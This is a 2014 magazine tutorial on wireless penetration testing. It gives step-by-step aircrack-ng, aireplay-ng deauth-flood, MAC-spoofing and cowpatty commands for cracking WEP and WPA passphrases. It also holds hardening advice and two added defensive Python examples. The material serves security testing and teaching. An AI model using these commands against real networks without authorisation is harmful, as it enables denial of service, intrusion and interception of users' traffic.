WIRELESS PENETRATION TESTING APPROACH TO SECURING CLIENT’S WIRELESS ACCESS POINT

by Saurabh Kumar

Our clients reach out to us when their wireless access point challenges are unclear and they are not confident that they have the internal capability to meet their wireless security control requirements cost-effectively. What we bring to our clients is our experience in providing tested, reliable processes and recommendations for their particular situation.

INTRODUCTION

Among recent developments in IT, wireless technology is one that most organizations have adopted for its advantages and ease of use.

Security is a main concern for every organization. Almost every organization uses wireless for communication and data transfer. This internal communication carries a great deal of sensitive information, and if an unauthorized user is able to sniff or connect to the wireless access point, the attacker becomes part of the internal network, can retrieve much of that information, and may impact the organization's data confidentiality, integrity, authentication and access control. Hence, securing an organization's wireless network is a key responsibility for information security professionals. Although organizations have already implemented security controls to protect their wireless networks, it is also important to check whether those controls have been implemented correctly.

WIRELESS PENETRATION TESTING APPROACH

This section describes the approach for testing the strength of your wireless network. The approach combines password lists with sniffing to crack poorly secured wireless networks, so a proper setup is required to make the whole process semi-automated or fully automated.

Here are three key points:

  1. Wireless penetration tests evaluate the risk related to potential access to your wireless network.

  2. Wireless access points provide a simple way for attackers to penetrate your internal network.

  3. A wireless attack and penetration test will identify vulnerabilities and offer advice for hardening and remediation.


In this article, we will cover the seven most important steps of wireless penetration testing, described in detail below:

  1. Setting up the penetration testing lab and process;

  2. Wireless penetration testing phase tools;

  3. Wireless encryption protocols and the initial attack process with their phase tools;

  4. How the access point and client communicate with each other;

  5. Wireless cracking techniques;

  6. Threats to wireless networks;

  7. How to secure wireless networks.

PENETRATION TESTING SETUP AND PROCESS

LAB SETUP:

  1. Laptop/computer with Backtrack installed:

Download Backtrack in the 32-bit or 64-bit build that your hardware supports.

     1. Backtrack 5R3 ISO/VMware (recommended)

     2. Backtrack 5R2 ISO/VMware

     3. Backtrack 5R1/5 ISO/VMware

  2. Wireless card: This is the most important part of the wireless test setup. The card must be supported by the Backtrack version you have chosen. It is also possible that the laptop's internal card is not supported, in which case you will need an external wireless card.

You will need a USB wireless card that supports packet injection and packet sniffing and that is supported by Backtrack. The best choice seems to be the Alfa AWUS036H card from Alfa Networks.

  3. Password list: The passphrase provides the encryption security for your wireless network. The passphrase can also be referred to as a password, network security key, pre-shared key, or just key.

A password list is the key to wireless cracking: the more extensive the password repository, the greater the chance of cracking a wireless network. The possible scenarios are:

     1. Dictionaries and password lists can be as simple or as complex as you want. They can be filled with random words in all lower case, or with common words and phrases including capitalization, numbers and symbols.

     2. Use the password list file if it is already in your repository.

     3. If not, download an updated password list file; such files are easy to find with a web search.

Before analyzing the strength of wireless encryption, we need to understand the wireless penetration testing tools, the different types of encryption protocols, the WLAN discovery process and, briefly, how to change the MAC address.

WIRELESS PENETRATION TESTING PHASE TOOLS:

Semi-automated wireless toolkit

  1. Wireless discovery tools:

aerosol, airfart, aphopper, apradar, karma, kismet, ministumbler, netstumbler, wellenreiter, wifi hopper, wirelessmon

  2. Packet capture tools:

airopeek, airtraf, apsniff, cain, wireshark

  3. WEP/WPA password attack tools:

aircrack-ptw, aircrack-ng, aircrack, airsnort, cowpatty, wepattack, wepcrack, airbase, wzcook

  4. Frame generation tools:

airgobbler, airpwn, airsnarf, commview, fake ap, void11, wifitap

wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p]] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

Fully-automated wireless toolkit

  1. Fern-Wifi-cracker: GUI for testing wireless encryption strength.

  2. Wi-fihoney: creates fake APs using all encryption types and monitors them with airodump.

  3. Wifite: automated wireless auditor.

WIRELESS ENCRYPTION PROTOCOLS AND INITIAL ATTACK PROCESS WITH THEIR PHASE TOOLS:

The following protocols are used in wireless networks to protect information in transit between a system and the wireless router/access point:

  1. WEP: WEP stands for Wired Equivalent Privacy. This is the first encryption protocol developed for wireless networks. It was designed to add security to WLANs, and was intended to give wireless networks a level of privacy equivalent to that of a comparable wired network. The major problem with WEP was that the key was not hashed but simply concatenated to the Initialization Vector (IV).

WEP operates at the two lowest layers of the OSI model, the data link and physical layers; it therefore does not offer end-to-end security. Today it is outdated and contains many security weaknesses, but some organizations may still use it for devices on their wireless network that have not been updated.

In addition, WEP occasionally produces cryptographically weak ciphertext that is easily broken with modern tools.

Here is the initial attack process for WEP-related networks:

WLAN discovery ->

Unencrypted WLAN (visible SSID):

  1. Sniff for the IP range.

  2. If MAC authorization or MAC filtering is in place, spoof a valid MAC.

Unencrypted WLAN (hidden SSID) -> deauthenticate (deauth) a client:

  1. aireplay-ng

aireplay-ng -0 1 -a [Access Point MAC] -c [Client MAC] [interface]

  2. commview

Tools > Node re-association

  3. void11

void11_penetration wlan0 -D -t 1 -B [MAC]

WEP encrypted WLAN (visible SSID):

  1. WEPattack

wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]

  2. Capture / inject packets and break WEP with aircrack-ptw

aircrack-ptw [pcap file]

  3. Aircrack-ng

aircrack-ng -q -n [WEP key length] -b [BSSID] [pcap file]

  4. Airsnort

Channel > Start

  5. WEPcrack

perl WEPCrack.pl

./pcap-getIV.pl -b 13 -i wlan0

WEP encrypted WLAN (hidden SSID) -> deauthenticate (deauth) a client:

  1. Aireplay-ng

aireplay-ng -0 1 -a [Access Point MAC] -c [Client MAC] [interface]

  2. Commview

Tools > Node re-association

  3. Void11

void11_hopper

void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]

  2. WPA: WPA stands for Wi-Fi Protected Access. It is the successor to WEP. It uses TKIP (Temporal Key Integrity Protocol), which changes the key with every data packet, and a message integrity check, which protects against capturing, modifying and resending data packets by determining whether a packet has been modified. For user authentication it uses EAP (Extensible Authentication Protocol), because in WEP authentication is done by MAC address, which can easily be sniffed. However, during the 4-way handshake at client association it is possible to obtain the hashed network key. WPA is vulnerable to timing attacks and dictionary attacks.

Here is the initial attack process for WPA-related networks:

WLAN discovery -> WPA encrypted WLAN: deauthenticate (deauth) a client -> capture the EAPOL handshake -> WPA attack

  1. Cowpatty

./cowpatty -r [pcap file] -f [wordlist] -s [SSID]

./genpmk -f dictionary_file -d hashfile_name -s ssid

./cowpatty -r capture_file.cap -d hashfile_name -s ssid

  2. Aircrack-ng

aircrack-ng -a 2 -w [wordlist] [pcap file]

  3. WPA2: WPA2 is an advanced form of WPA and is currently one of the most widely used security protocols. It uses AES (Advanced Encryption Standard) for encryption, which is much more secure than TKIP. It also supports ad-hoc networks, while WPA is limited to infrastructure networks. AES itself is assumed to be unbreakable; the only thing required is to make your passphrase complex.

There are two different types of WPA2:

WPA2-PSK: PSK is the pre-shared key. It is designed for very small networks, e.g. home networks.

WPA2-ENT: ENT is enterprise, so it is made for enterprise use. It is much more secure than WPA2-PSK, as the passphrase is not stored locally.

Here is the initial attack process for WPA2-related networks:

WLAN discovery -> WPA2 encrypted WLAN: deauthenticate (deauth) a client -> capture the EAPOL handshake -> WPA2 dictionary attack

  1. Cowpatty

./cowpatty -r [pcap file] -f [wordlist] -s [SSID]

./genpmk -f dictionary_file -d hashfile_name -s ssid

./cowpatty -r capture_file.cap -d hashfile_name -s ssid

  2. Aircrack-ng

aircrack-ng -a 2 -w [wordlist] [pcap file]
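The genpmk step above precomputes the Pairwise Master Key (PMK) that both WPA-PSK and WPA2-PSK derive from the passphrase and the SSID; the 4-way handshake only proves knowledge of that PMK, which is why a dictionary attack never has to break AES. The Python below is an added example, not part of the original article or of the cowpatty/aircrack-ng tools: it shows the derivation (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as salt), that a precomputed hash file is bound to one SSID, and the passphrase policy the article recommends later. The word list is constructed; the "password"/"IEEE" pair is the IEEE 802.11i test vector.

```python
import hashlib

# WPA-PSK / WPA2-PSK derive the 256-bit Pairwise Master Key (PMK) from the
# passphrase with PBKDF2-HMAC-SHA1: 4096 iterations, the SSID as salt, 32-byte
# output (IEEE 802.11i). This is the value genpmk precomputes per SSID; the
# 4-way handshake only proves knowledge of it, so AES is never attacked.
PBKDF2_ITERATIONS = 4096
PMK_LENGTH = 32
SPECIAL_CHARS = set("!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~")


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the PMK for a passphrase/SSID pair (the value genpmk stores)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA-PSK passphrase is 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)


def pmk_hashfile(wordlist, ssid: str) -> dict:
    """What genpmk builds for one SSID: PMK -> passphrase for every list entry.
    Because the SSID is the salt, the table is useless against any other SSID,
    which is why the article advises against default or guessable SSIDs."""
    table = {}
    for candidate in wordlist:
        if 8 <= len(candidate) <= 63:
            table[derive_pmk(candidate, ssid)] = candidate
    return table


def policy_violations(passphrase: str) -> list:
    """Check the article's policy: at least 8 characters with one upper-case
    letter, one lower-case letter and one special character."""
    problems = []
    if len(passphrase) < 8:
        problems.append("shorter than 8 characters")
    if not any(c.isupper() for c in passphrase):
        problems.append("no upper-case letter")
    if not any(c.islower() for c in passphrase):
        problems.append("no lower-case letter")
    if not any(c in SPECIAL_CHARS for c in passphrase):
        problems.append("no special character")
    return problems


if __name__ == "__main__":
    # Constructed sample word list; "password" is the passphrase Figure 6 recovers.
    sample_words = ["password", "letmein1", "Tr0ub4dor&3", "short"]
    table = pmk_hashfile(sample_words, "IEEE")
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    print("entries in hash file for SSID IEEE:", len(table))
    print("same PMK valid for SSID linksys?",
          derive_pmk("password", "linksys") in table)
    for word in sample_words:
        print(f"{word!r}: {policy_violations(word) or 'meets policy'}")
```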

HOW THE ACCESS POINT AND CLIENT WORK:

Before cracking a wireless network it is essential to know how the access point and the client interact with each other.

The first step is to turn on the device with the wireless card and sniff the communication in promiscuous mode using Wireshark to capture every packet; from the capture you can easily see how it works.

Below are the requests and responses exchanged when wireless communication is established:

  1. Null probe request (broadcast message): sent by the client to search for available wireless networks.

  2. Probe response: sent by the access point.

  3. Authentication request: the client sends a request to the access point.

  4. Authentication response: the access point's response, if authentication is successful.

  5. Association request: the client sends a request to the access point so that the two can talk to each other.

  6. Association response: sent by the access point to the client.

After that, data transfer starts.

WIRELESS CRACKING TECHNIQUE:

This article covers two wireless cracking techniques: the semi-automated and the fully automated approach.

  1. SEMI-AUTOMATED APPROACH

     1. Bring the wireless interface up: The first step in cracking a wireless network is to configure the wireless card and bring the wireless interface up.

To do this, plug the wireless card (Alfa card) into the virtual machine and make sure it is connected to the virtual machine:

Go to VM > Removable Devices and click Connect for the Alfa wireless card.

Now run airmon-ng in the virtual machine terminal. This will show the wireless interface that is available; now you need to bring it up. Run the following if it is not up:

ifconfig wlan0 up (in this case the interface is wlan0)

     2. Change the MAC address of the wireless interface (optional): While trying to crack a wireless network, a malicious user wants to hide their identity and so changes their MAC address. For this you need to bring the interface down, use a MAC changer utility/command to change the MAC address, and then bring the interface up again.

Use the MAC address changing commands and utilities below:

In Linux:

ifconfig [interface] hw ether [MAC]

macchanger

Random MAC address: macchanger -r eth0

In Windows:

MAC Address Changer for Windows, madmacs, TMAC, SMAC

     3. Create the monitor (mon0) interface: Before looking for networks, you must put the wireless card into what is called "monitor mode". Monitor mode is a special mode that allows the PC to listen to every wireless packet. Monitor mode also optionally allows injecting packets into a network.

So the next step is to create the monitor interface to sniff the communication. Use the following command:

airmon-ng start wlan0

This will create the monitor interface mon0, up and running.

Figure 1. How to start the monitor interface mon0 and bring it up

     4. DETECT AVAILABLE WIRELESS NETWORKS: Now it is time to find our target. Run the airodump-ng command to find a wireless target. This will search for available wireless networks. These networks may be in different bands, and the Alfa wireless card works on the b and g (802.11b/802.11g) bands only.

To show only available wireless networks in the b and g bands, run the command below:

airodump-ng --band bg mon0

Here the parameters are: --band = the band(s) on which airodump-ng should hop; mon0 = the monitor mode interface.

After this command, airodump-ng starts scanning the airspace. Ensure that channel hopping happens across both the 802.11b and g bands and that the available networks are listed. It displays a lot of information, including parameters such as BSSID, channel and signal strength.

Figure 2. Associated and non-associated wireless networks with their BSSIDs

airodump-ng hops from channel to channel and shows all access points it can receive beacons from.

        1. Channels 1 to 14 are used for 802.11b and 802.11g (in the US only channels 1 to 11 are allowed; 1 to 13 in Europe with some special cases; 1 to 14 in Japan).

        2. Channels between 36 and 149 are used for 802.11a.

Table 1. The upper data block shows the access points found:

BSSID - The MAC address of the access point (Basic Service Set Identifier, its Ethernet address)
PWR - Signal strength. Some drivers do not report it
Beacons - Number of beacon frames received. If you do not have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality
Data - Number of data frames received
CH - Channel the AP is operating on
MB - Speed or AP mode. 11 is pure 802.11b, 54 pure 802.11g. Values in between are a mixture
ENC - Encryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (not known yet)
ESSID - The network name. Sometimes hidden

Table 2. The lower data block shows the clients found:

BSSID - The MAC of the AP this client is associated to
STATION - The MAC of the client itself
PWR - Signal strength. Some drivers do not report it
Packets - Number of data frames received
Probes - Network names (ESSIDs) this client has probed

     5. Select the target wireless network: Now select the target wireless network from the available networks. It is essential to note the specific channel on which the target network is running. You will also need to note its BSSID.

     6. Capture the target's packets: After selecting the wireless network, it is time to capture its packets.

Run the command below:

airodump-ng --channel 3 -w captureddata --bssid 00:21:91:d2:8E:25 mon0

Here,

--channel = tune to a channel

-w = set the name prefix of the capture file (captureddata is the file where the capture will be saved). The packets are saved with a .cap extension, possibly split across multiple files; to use them all, add all their names or use a wildcard such as captureddata*.cap.

--bssid = target access point MAC address

mon0 = monitor mode interface

This starts capturing packets, but to crack a WEP network we need to capture ARP packets in particular. aireplay-ng sniffs ARP packets and replays them into the network.

Use the command below to capture a larger number of packets:

aireplay-ng --arpreplay -e ESSID mon0

On a slow WLAN, capturing the requisite number of weak IVs can take some time. To accelerate the attack, this command starts intercepting and replaying ARP packets (an injection/interception rate of 512 packets per second generally results in the required number of IVs being captured in about 10 minutes for 40-bit and 30 minutes for 128-bit WEP). This is called a replay attack, and the greater the number of captured ARP packets, the higher the chance of cracking the wireless network. ARP is a fixed-header protocol, so the size of an ARP packet is easily determined and can be used to identify ARP packets even within encrypted traffic. A replay attack only works for authenticated and associated client MAC addresses, so to provoke ARP packets we send deauth packets.

Note: WEP misuses these IVs in an exploitable way, and once a certain number of weak IVs have been captured the WEP key can be determined. Roughly 125,000 packets are required to crack most 40-bit WEP keys, and 200,000-250,000 packets for a 128-bit WEP key.

     7. Deauth (deauthentication) attack: This is also known as a denial of service attack, as it disconnects a client from the access point for as long as deauth packets are sent. The purpose of sending deauth packets is to disconnect the client and force it to reconnect, so that ARP packets can be captured.

Command for sending deauth packets:

aireplay-ng --deauth 0 -e XYZ mon0

Here are the parameter details:

XYZ = ESSID name of the target network

mon0 = interface name

-e essid = for a fakeauth attack or injection test, sets the target AP SSID. This is optional when the SSID is not hidden.

While running the above command it is possible that it results in a channel error, because the wireless network is running on a different channel. In that case you will need to run airodump-ng again on the same channel and then send the deauth packets.

For penetration testing purposes, connect a mobile device to the wireless network and start sending these packets. You will see the PWR value of that wireless network drop to 0 and the mobile device disconnect automatically for as long as the packets are being sent; afterwards it automatically reconnects to the same wireless network.

Figure 3. PWR value reached 0 after sending deauth packets

     8. Cracking the wireless passphrase:

The encrypted traffic is now captured in "captureddata"; run that file through aircrack-ng using a password file. Remember that this type of attack is only as good as the password file.

The default password list included with aircrack-ng on BackTrack is named darkc0de:

/pentest/passwords/wordlists/darkc0de

        1. Once enough ARP packets (a sufficient number of IVs) have been captured, they are saved in the .cap file.

        2. Crack the wireless network using aircrack-ng as shown in the command below, giving the captured .cap file as input:

aircrack-ng captureddata-01.cap

        3. It is also possible that it will ask for -w (dictionary file), in which case you need to give the path of the dictionary file:

aircrack-ng -w passwordfile captureddata-01.cap

Here,

passwordfile = /pentest/passwords/wordlists/darkc0de

After launching the above command, wait for the passphrase.

     9. Compromise and access to sensitive information: Once the wireless passphrase or key is found, a malicious user is able to sniff sensitive information such as usernames, passwords and HTTP session IDs inside the wireless network, and can then compromise the complete wireless network.


  2. FULLY-AUTOMATED APPROACH:

This is the best and easiest approach for cracking a wireless network. Fern Wi-Fi Cracker can crack WEP, WPA and WPA2 secured wireless networks. Fern basically uses the command line utilities to crack these networks. The tool has a GUI in which we only need to select the target wireless network; the rest is done automatically and the output is the passphrase.

Path to Fern Wi-Fi Cracker inside the BackTrack directory tree: /pentest/wireless/fern-wifi-cracker/

To start Fern from the terminal, type the following commands:

# cd /pentest/wireless/fern-wifi-cracker

# python execute.py

Or from the menu: Applications > BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > fern-wifi-cracker

Fern also provides some extra functionality for hijacking sessions and locating a computer's geo-location via its MAC address.

Figure 4. Fern Wi-Fi Cracker tool

Figure 5. Fern Wi-Fi Cracker tool with monitor mode (mon0)

After executing the Python script, the tool's GUI opens. The only thing required is to select the wireless interface and click on scan for access point. Then select the wireless network and click on the attack button. The cracking process starts automatically and the passphrase is the output.

Once Fern has captured the handshake it starts the brute force attack. Voilà! If the WPA key is in the password list being used, it displays the found key in red.

Figure 6. Passphrase "password" found using Fern Wi-Fi Cracker

Back on the Fern main screen is a Key Database button, which now shows one entry.

Figure 7. Passphrase entries in the Fern key database

Clicking the Key Database button displays the found keys.

Figure 8. Passphrase "password" entry in the Fern key database

CLOUD PASSWORD CRACKING SERVICE:

There is an online password cracking service for penetration testers and network auditors who need to check the security of WPA protected wireless networks, crack password hashes, or break document encryption.

Figure 9. Online cloud-based password cracking service

THREATS TO WIRELESS NETWORKS

Below are the different categories of wireless attack, which can affect the CIA (confidentiality, integrity and availability) of any organization.

  1. WIRELESS SNIFFING: This is one of the most dangerous attacks on a wireless network, as a malicious user can capture packets during transmission and may be able to see their complete details, including the activities on the network. If the traffic is unencrypted, a malicious user gets the full details of every packet.

  2. MIRROR IMAGE ACCESS POINT: This is a fake access point created by a malicious user after gathering information about a public access point. The malicious user creates an access point with a stronger signal than the real access point and broadcasts it. Users connect to the strongest signal and thus become victims.

  3. AD-HOC NETWORK: This is the simplest attack to launch. A malicious user can connect to your ad-hoc network and gain access to sensitive files.

  4. BUFFER OVERFLOW: Allows a malicious user to exploit vulnerabilities in software (the various OS/applications present) to gain escalated privileges on the target machine.

  5. REMOTE CONTROL SOFTWARE: Allows a malicious user to install software to remotely control the target machine and compromise the network.

  6. VIRUS/WORM/SPYWARE: Malicious code that exploits system vulnerabilities to gain privileged access or to manipulate data.

  7. ARP REDIRECTION/SPOOFING: This attack, also called MAC spoofing, allows a malicious user to redirect network traffic to his/her own system.

  8. DENIAL OF SERVICE ATTACK: Also known as a deauthentication attack, as it disconnects a client from the access point for as long as deauth packets are sent. This attack disconnects the wireless service and makes the resource unavailable.

HOW TO SECURE WIRELESS NETWORKS

  1. Place access point devices in the right location: Position the access point so that it is accessible to most of your users and provides them with good signal strength. The advantage of this is that it prevents the signal from leaking outside. It is also recommended to manage the wireless signal strength on the basis of the organization's internal users and area range.

  2. Use a strong encryption algorithm: It is highly recommended to use a strong encryption algorithm in combination with a strong password policy, i.e. a minimum of 8 characters with at least one upper case letter, one lower case letter and one special character.

Organizations should not use their organization name as the SSID and should also change their SSID periodically. If the SSID is compromised, changing it makes the captured information unusable.

  3. Change default settings: It is advisable to change the default settings, i.e. the default password, encryption key and weak SNMP community strings, and if a weak algorithm is in use, change it to a stronger one.

  4. SSID security: A broadcast SSID is a gift to an attacker. It saves the attacker time and lets them concentrate on the attack.

  5. Authentication verification: It is recommended to verify authentication before granting access. This can also be done in terms of MAC/IP verification, although IP and MAC addresses can be spoofed. The best solution is to implement a RADIUS server to authenticate users.

  6. Access point updates: It is highly recommended to update your access point software from time to time, so that vulnerabilities in previous versions of the software are mitigated, reducing the chance of attack.

  7. Logging: Logging helps an organization find out the attack pattern.

  8. Securing guest access: Sometimes it is essential for an organization to provide guest access to its wireless network. In this case it is recommended to provide a separate access point for guests, and if that is not possible, to authenticate those users before giving them access to the wireless network. This authentication can be done via a mobile number, SMS, etc.

  9. Wireless audit: A wireless audit is performed by external vendors to analyze the security strength of your wireless network. The outcome of this exercise includes the presence of unauthorized devices on the network, security policy gaps, etc.

  10. Security awareness: This is also one of the key factors in protecting a wireless network. It is the organization's responsibility to promote awareness of wireless security and its impact among its employees.

  11. Wireless IDS/IPS: It is recommended to implement a wireless IDS/IPS with a secure configuration, so that it monitors all traffic and generates an alert if any suspicious activity is detected. It should also monitor the wireless devices and report if any of them go missing.
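
The deauthentication flood described in the cracking section is exactly the kind of suspicious activity a wireless IDS should alert on: the frames are unauthenticated management frames whose transmitter address is forged as the AP's, so only their rate and reason code give them away. The Python below is an added example, not code from the article or from any of the tools it names; it parses the 802.11 management-frame header, classifies the probe/authentication/association frames listed earlier, and raises an alert when a (BSSID, target) pair sees a burst of deauth frames. All frames are constructed inline; the BSSID is the article's airodump-ng example value and the client MAC is made up.

```python
import struct
from collections import defaultdict, deque

# Simplified 802.11 management-frame handling for a wireless IDS check.
# Frame control, byte 0 (little-endian): bits 0-1 version, 2-3 type, 4-7 subtype.
# Management frames (type 0) carry addr1 = receiver, addr2 = transmitter,
# addr3 = BSSID, followed by a 2-byte sequence control field.
TYPE_MANAGEMENT = 0
SUBTYPE_NAMES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req",
                 5: "probe-resp", 8: "beacon", 10: "disassoc",
                 11: "auth", 12: "deauth"}
SUBTYPE_DEAUTH = 12
MGMT_HEADER = struct.Struct("<HH6s6s6sH")   # fc, duration, addr1, addr2, addr3, seq
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str,
                     body: bytes = b"", seq: int = 0) -> bytes:
    """Build a raw management frame; used here only to construct sample input."""
    frame_control = (TYPE_MANAGEMENT << 2) | (subtype << 4)
    return MGMT_HEADER.pack(frame_control, 0, mac_to_bytes(dst), mac_to_bytes(src),
                            mac_to_bytes(bssid), seq << 4) + body


def parse_mgmt_frame(frame: bytes):
    """Describe a management frame as a dict; return None for other frame types."""
    if len(frame) < MGMT_HEADER.size:
        return None
    fc, _duration, addr1, addr2, addr3, _seq = MGMT_HEADER.unpack_from(frame)
    if (fc >> 2) & 0x3 != TYPE_MANAGEMENT:
        return None
    subtype = (fc >> 4) & 0xF
    info = {"subtype": SUBTYPE_NAMES.get(subtype, f"mgmt-{subtype}"),
            "dst": bytes_to_mac(addr1), "src": bytes_to_mac(addr2),
            "bssid": bytes_to_mac(addr3)}
    if subtype in (10, SUBTYPE_DEAUTH) and len(frame) >= MGMT_HEADER.size + 2:
        # Disassociation and deauthentication bodies begin with a 16-bit reason code.
        info["reason"] = struct.unpack_from("<H", frame, MGMT_HEADER.size)[0]
    return info


def detect_deauth_floods(captures, threshold: int = 5, window: float = 2.0):
    """captures: iterable of (timestamp_seconds, raw_frame) in capture order.
    Emits one alert per (BSSID, target) the first time `threshold` deauth frames
    for that pair fall within `window` seconds: a legitimate AP sends the odd
    deauth, whereas an aireplay-ng --deauth 0 run sends them continuously."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, frame in captures:
        info = parse_mgmt_frame(frame)
        if info is None or info["subtype"] != "deauth":
            continue
        key = (info["bssid"], info["dst"])
        times = recent[key]
        times.append(ts)
        while ts - times[0] > window:
            times.popleft()
        if len(times) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": key[0], "target": key[1], "count": len(times),
                           "first_seen": times[0], "last_seen": ts,
                           "reason": info.get("reason")})
    return alerts


def sample_capture():
    """Constructed sample: a normal association, then a broadcast deauth flood."""
    ap = "00:21:91:d2:8e:25"        # the BSSID used in the article's airodump-ng example
    client = "00:1a:2b:3c:4d:5e"    # made-up client station
    reason = struct.pack("<H", 7)   # "class 3 frame received from nonassociated STA"
    frames = [
        (0.00, build_mgmt_frame(4, BROADCAST, client, BROADCAST)),  # null probe request
        (0.01, build_mgmt_frame(5, client, ap, ap)),                # probe response
        (0.02, build_mgmt_frame(11, ap, client, ap)),               # authentication request
        (0.03, build_mgmt_frame(11, client, ap, ap)),               # authentication response
        (0.04, build_mgmt_frame(0, ap, client, ap)),                # association request
        (0.05, build_mgmt_frame(1, client, ap, ap)),                # association response
        (5.00, build_mgmt_frame(12, client, ap, ap, reason)),       # one deauth: not a flood
    ]
    # Ten deauths "from" the AP to the broadcast address, 0.1 s apart.
    frames += [(10.0 + i * 0.1, build_mgmt_frame(12, BROADCAST, ap, ap, reason, seq=i))
               for i in range(10)]
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_floods(sample_capture()):
        print(alert)
```

On a real capture the frames would come from the monitor interface (for example airodump-ng's .cap output opened in Wireshark) rather than from sample_capture(); where the access point supports it, 802.11w management frame protection is the definitive fix for forged deauth frames.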


SUMMARY:

In this article we have covered the seven must-dos for learning wireless penetration testing, and we recommend following them. During practical wireless testing we have observed that these steps help our clients find the weaknesses of their wireless networks and secure their WLANs.

We have learned in detail the following wireless penetration testing concepts:

  1. How to set up a wireless lab, with detailed instructions;

  2. Key observations about WLAN protocols;

  3. How to conduct wireless attacks using wireless as the base;

  4. How to conduct a wireless penetration test using Backtrack and other open source tools;

  5. How the access point and client communicate with each other;

  6. What the threats to wireless networks are;

  7. How to secure wireless networks.

ARTICLE'S ACRONYMS:

EAPOL - Extensible authentication protocol over LAN

USB - Universal serial bus

WEP - Wired equivalent privacy

WAP - Wireless application protocol

WLAN - Wireless local area network

PSK - Pre-shared key

ENT - Enterprise

MAC address - Media access control address

SSID - Service set identifier

AES - Advanced encryption standard

TKIP - Temporal key integrity protocol

EAP - Extensible authentication protocol

BSSID - Basic service set identifier

ESSID - Extended service set identifier

ARP - Address resolution protocol

AP - Access point

IVs - Initialization vectors

IP - Internet protocol

REFERENCES:

Mailing lists: Securityfocus.com has mailing lists, which are focused groups for technical discussions. It is recommended to subscribe to the [email protected] list to stay in touch with the latest updates in the field.

Websites: The Aircrack-ng site is the best resource to stay updated on new tools for wireless penetration testing:

  1. http://www.aircrack-ng.org

Among wireless penetration testing websites is Raul Siles' website, which contains a detailed list of tools, papers, research articles, conference materials and much more, all dedicated to wireless security:

  1. http://www.raulsiles.com/resources/wifi.html

Joshua Wright's blog, though not very regularly updated, is the definitive place for the latest on WPA-Enterprise attacks:

  1. http://www.willhackforsushi.com/

Wireless password lists can be downloaded from the following link:

  1. http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/

Conferences: Hacker and security conferences such as Defcon and Blackhat have excellent talks and workshops each year on various security topics, including wireless security. Most of the talk videos and course materials are released free of charge online. It is worth following these conferences:

  1. Defcon: http://www.defcon.org

  2. Blackhat: http://www.blackhat.com

BackTrack-related: BackTrack as a platform is evolving constantly. It is important to ensure that your BackTrack copy is always the latest and greatest. The following websites are the first place for any release announcements:

  1. BackTrack website: http://www.backtrack-linux.org

  2. Offensive Security: http://www.offensive-security.com

Other open source tools:

  1. http://www.codeproject.com/Articles/10493/MAC-Address-Changer-for-Windows-XP-2003

  2. https://code.google.com/p/fern-wifi-cracker/

  3. https://www.cloudcracker.com/#!/handshake


About the Author:

I have been working in the IT Security domain since 2007 and have acquired knowledge and practical experience in infrastructure security, network security, web application security, mobile application security and security operation center, such as malware analysis. I have received several certifications such as GCIA, ECSA, CHFI and ECSA. I have completed the certification course CNSS from CDAC (Dept. of IT and Communication ministry, India). I am working with Protiviti, Middle East region, as a Senior Security Consultant in Kuwait City. Prior to Protiviti, I spent 5 years with big security firms such as Symantec, HCL and Aujas. A more complete version of my profile can be accessed at kw.linkedin.com/pub/saurabh-porwal/15/598/347/.

 

1. We hope you enjoyed this article and the exercises in it. By now you should be able to conduct penetration tests on wireless networks with ease using wireless penetration testing tools. Our final advice is to always be a reader and keep learning! This is what will keep you sharper than the competition.

2. The tools used in this article are available via the links provided in the references or can easily be found on the internet.

3. We wish you all the best for a career in wireless penetration testing.

September 4, 2014
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013